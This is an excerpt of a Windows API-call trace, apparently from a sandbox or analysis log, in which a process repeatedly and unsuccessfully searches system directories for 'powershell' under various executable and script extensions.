	[0534.669] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.CMD", lpFindFileData=0x1c80dea0 | out: lpFindFileData=0x1c80dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0534.677] SetErrorMode (uMode=0x1) returned 0x1
	[0534.679] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0534.679] SetErrorMode (uMode=0x1) returned 0x1
	[0534.679] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBS", lpFindFileData=0x1c80dea0 | out: lpFindFileData=0x1c80dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0534.687] SetErrorMode (uMode=0x1) returned 0x1
	[0534.688] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0534.688] SetErrorMode (uMode=0x1) returned 0x1
	[0534.688] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBE", lpFindFileData=0x1c80dea0 | out: lpFindFileData=0x1c80dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0535.616] SetErrorMode (uMode=0x1) returned 0x1
	[0535.617] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0535.617] SetErrorMode (uMode=0x1) returned 0x1
	[0535.617] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JS", lpFindFileData=0x1c80dea0 | out: lpFindFileData=0x1c80dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0535.626] SetErrorMode (uMode=0x1) returned 0x1
	[0535.627] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0535.627] SetErrorMode (uMode=0x1) returned 0x1
	[0535.627] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JSE", lpFindFileData=0x1c80dea0 | out: lpFindFileData=0x1c80dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0535.635] SetErrorMode (uMode=0x1) returned 0x1
	[0535.636] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0535.637] SetErrorMode (uMode=0x1) returned 0x1
	[0535.637] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSF", lpFindFileData=0x1c80dea0 | out: lpFindFileData=0x1c80dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0535.645] SetErrorMode (uMode=0x1) returned 0x1
	[0535.646] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0535.646] SetErrorMode (uMode=0x1) returned 0x1
	[0535.646] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSH", lpFindFileData=0x1c80dea0 | out: lpFindFileData=0x1c80dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0535.654] SetErrorMode (uMode=0x1) returned 0x1
	[0535.656] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0535.656] SetErrorMode (uMode=0x1) returned 0x1
	[0535.656] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.MSC", lpFindFileData=0x1c80dea0 | out: lpFindFileData=0x1c80dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0536.536] SetErrorMode (uMode=0x1) returned 0x1
	[0536.537] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0536.537] SetErrorMode (uMode=0x1) returned 0x1
	[0536.538] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell", lpFindFileData=0x1c80dea0 | out: lpFindFileData=0x1c80dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0536.547] SetErrorMode (uMode=0x1) returned 0x1
	[0536.548] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c80dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0536.548] SetErrorMode (uMode=0x1) returned 0x1
	[0536.548] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.ps1", lpFindFileData=0x1c80dea0 | out: lpFindFileData=0x1c80dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0536.549] SetErrorMode (uMode=0x1) returned 0x1
	[0536.549] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c80dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0536.549] SetErrorMode (uMode=0x1) returned 0x1
	[0536.549] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psm1", lpFindFileData=0x1c80dea0 | out: lpFindFileData=0x1c80dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0536.550] SetErrorMode (uMode=0x1) returned 0x1
	[0536.550] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c80dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0536.550] SetErrorMode (uMode=0x1) returned 0x1
	[0536.550] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psd1", lpFindFileData=0x1c80dea0 | out: lpFindFileData=0x1c80dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0536.550] SetErrorMode (uMode=0x1) returned 0x1
	[0536.550] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c80dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0536.551] SetErrorMode (uMode=0x1) returned 0x1
	[0536.551] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.COM", lpFindFileData=0x1c80dea0 | out: lpFindFileData=0x1c80dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0536.551] SetErrorMode (uMode=0x1) returned 0x1
	[0536.551] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c80dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0536.551] SetErrorMode (uMode=0x1) returned 0x1
	[0536.551] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.EXE", lpFindFileData=0x1c80dea0 | out: lpFindFileData=0x1c80dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0536.551] SetErrorMode (uMode=0x1) returned 0x1
	[0536.552] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c80dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0536.552] SetErrorMode (uMode=0x1) returned 0x1
	[0536.552] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.BAT", lpFindFileData=0x1c80dea0 | out: lpFindFileData=0x1c80dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0536.552] SetErrorMode (uMode=0x1) returned 0x1
	[0536.552] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c80dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0536.552] SetErrorMode (uMode=0x1) returned 0x1
	[0536.552] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.CMD", lpFindFileData=0x1c80dea0 | out: lpFindFileData=0x1c80dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0536.553] SetErrorMode (uMode=0x1) returned 0x1
	[0536.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c80dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0536.553] SetErrorMode (uMode=0x1) returned 0x1
	[0536.553] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBS", lpFindFileData=0x1c80dea0 | out: lpFindFileData=0x1c80dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0536.553] SetErrorMode (uMode=0x1) returned 0x1
	[0536.554] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c80dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0536.554] SetErrorMode (uMode=0x1) returned 0x1
	[0536.554] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBE", lpFindFileData=0x1c80dea0 | out: lpFindFileData=0x1c80dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0536.554] SetErrorMode (uMode=0x1) returned 0x1
	[0536.554] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c80dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0536.554] SetErrorMode (uMode=0x1) returned 0x1
	[0536.554] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JS", lpFindFileData=0x1c80dea0 | out: lpFindFileData=0x1c80dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0536.555] SetErrorMode (uMode=0x1) returned 0x1
	[0536.555] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c80dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0536.555] SetErrorMode (uMode=0x1) returned 0x1
	[0536.555] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JSE", lpFindFileData=0x1c80dea0 | out: lpFindFileData=0x1c80dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0536.555] SetErrorMode (uMode=0x1) returned 0x1
	[0536.555] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c80dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0536.556] SetErrorMode (uMode=0x1) returned 0x1
	[0536.556] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSF", lpFindFileData=0x1c80dea0 | out: lpFindFileData=0x1c80dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0536.556] SetErrorMode (uMode=0x1) returned 0x1
	[0536.556] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c80dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0536.556] SetErrorMode (uMode=0x1) returned 0x1
	[0536.556] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSH", lpFindFileData=0x1c80dea0 | out: lpFindFileData=0x1c80dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0536.556] SetErrorMode (uMode=0x1) returned 0x1
	[0536.557] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c80dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0536.557] SetErrorMode (uMode=0x1) returned 0x1
	[0536.557] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.MSC", lpFindFileData=0x1c80dea0 | out: lpFindFileData=0x1c80dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0536.557] SetErrorMode (uMode=0x1) returned 0x1
	[0536.557] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c80dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0536.557] SetErrorMode (uMode=0x1) returned 0x1
	[0536.557] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell", lpFindFileData=0x1c80dea0 | out: lpFindFileData=0x1c80dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0536.558] SetErrorMode (uMode=0x1) returned 0x1
	[0536.558] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c80dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0536.558] SetErrorMode (uMode=0x1) returned 0x1
	[0536.558] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.ps1", lpFindFileData=0x1c80dea0 | out: lpFindFileData=0x1c80dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0536.558] SetErrorMode (uMode=0x1) returned 0x1
	[0536.558] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c80dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0536.559] SetErrorMode (uMode=0x1) returned 0x1
	[0536.559] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psm1", lpFindFileData=0x1c80dea0 | out: lpFindFileData=0x1c80dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0536.559] SetErrorMode (uMode=0x1) returned 0x1
	[0536.559] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c80dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0536.559] SetErrorMode (uMode=0x1) returned 0x1
	[0536.559] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psd1", lpFindFileData=0x1c80dea0 | out: lpFindFileData=0x1c80dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0536.560] SetErrorMode (uMode=0x1) returned 0x1
	[0536.560] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c80dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0536.560] SetErrorMode (uMode=0x1) returned 0x1
	[0536.560] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.COM", lpFindFileData=0x1c80dea0 | out: lpFindFileData=0x1c80dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0536.560] SetErrorMode (uMode=0x1) returned 0x1
	[0536.560] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c80dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0536.560] SetErrorMode (uMode=0x1) returned 0x1
	[0536.561] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.EXE", lpFindFileData=0x1c80dea0 | out: lpFindFileData=0x1c80dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0536.561] SetErrorMode (uMode=0x1) returned 0x1
	[0536.561] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c80dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0536.561] SetErrorMode (uMode=0x1) returned 0x1
	[0536.561] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.BAT", lpFindFileData=0x1c80dea0 | out: lpFindFileData=0x1c80dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
